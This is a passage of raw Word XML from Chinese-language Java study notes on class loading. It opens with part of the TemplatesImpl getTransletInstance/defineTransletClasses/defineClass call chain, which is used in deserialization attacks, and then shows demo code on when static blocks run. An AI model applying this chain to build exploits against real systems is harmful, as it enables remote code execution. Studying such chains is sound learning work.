        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TransletClassLoader#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineClass</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8790C" w14:textId="77777777" w:rsidR="003658AD" w:rsidRPr="003658AD" w:rsidRDefault="003658AD" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="405" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA89A60" w14:textId="77777777" w:rsidR="003658AD" w:rsidRPr="003658AD" w:rsidRDefault="003658AD" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="300" w:line="405" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4300D7D3" w14:textId="7E1A22C1" w:rsidR="00AB3E74" w:rsidRDefault="00AB3E74" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C1CAB8" w14:textId="605F6C6F" w:rsidR="009948DF" w:rsidRDefault="003658AD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于对类加载、使用触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE61B3E" w14:textId="77777777" w:rsidR="009948DF" w:rsidRDefault="009948DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D02B06B" w14:textId="2979F6D8" w:rsidR="006944DB" w:rsidRDefault="006944DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>总结：类被加载起来，</w:t>
      </w:r>
      <w:r w:rsidR="00AF34C8" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>必须</w:t>
      </w:r>
      <w:r w:rsidR="00AF34C8" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidR="00AF34C8" w:rsidRPr="00541F42">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00AF34C8" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>才</w:t>
      </w:r>
      <w:r w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidR="00AF34C8" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>构造函数；</w:t>
      </w:r>
      <w:r w:rsidR="00574827" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="00574827" w:rsidRPr="00541F42">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>TestStatic1 t = null;</w:t>
      </w:r>
      <w:r w:rsidR="00574827" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00AF34C8" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:r w:rsidR="00574827" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>会触发</w:t>
      </w:r>
      <w:r w:rsidR="00AF34C8" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>任何</w:t>
      </w:r>
      <w:r w:rsidR="00B56A0B" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的执行；</w:t>
      </w:r>
      <w:r w:rsidR="00E3767F" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果实例化自己，如</w:t>
      </w:r>
      <w:r w:rsidR="00E3767F" w:rsidRPr="00541F42">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new TestStatic1()</w:t>
      </w:r>
      <w:r w:rsidR="00E3767F" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，就会触发</w:t>
      </w:r>
      <w:r w:rsidR="00EB16EC" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一切</w:t>
      </w:r>
      <w:r w:rsidR="00E3767F" w:rsidRPr="00541F42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00573D6C" w:rsidRPr="00573D6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>必须得</w:t>
      </w:r>
      <w:r w:rsidR="00573D6C" w:rsidRPr="00573D6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidR="00573D6C" w:rsidRPr="00573D6C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B61760" w14:textId="77777777" w:rsidR="006944DB" w:rsidRPr="009948DF" w:rsidRDefault="006944DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7AC401" w14:textId="5AF5E151" w:rsidR="00C93FF2" w:rsidRDefault="006944DB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC4A57" w14:textId="29456892" w:rsidR="00C93FF2" w:rsidRDefault="00DB229F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ain.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3F585" w14:textId="77777777" w:rsidR="00DB229F" w:rsidRDefault="00DB229F" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>org.example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public static void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[] args){</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//        System.out.println("main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数被触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">StaticDemo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">obj = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"----------------"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">StaticDemo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">obj2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>StaticDemo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
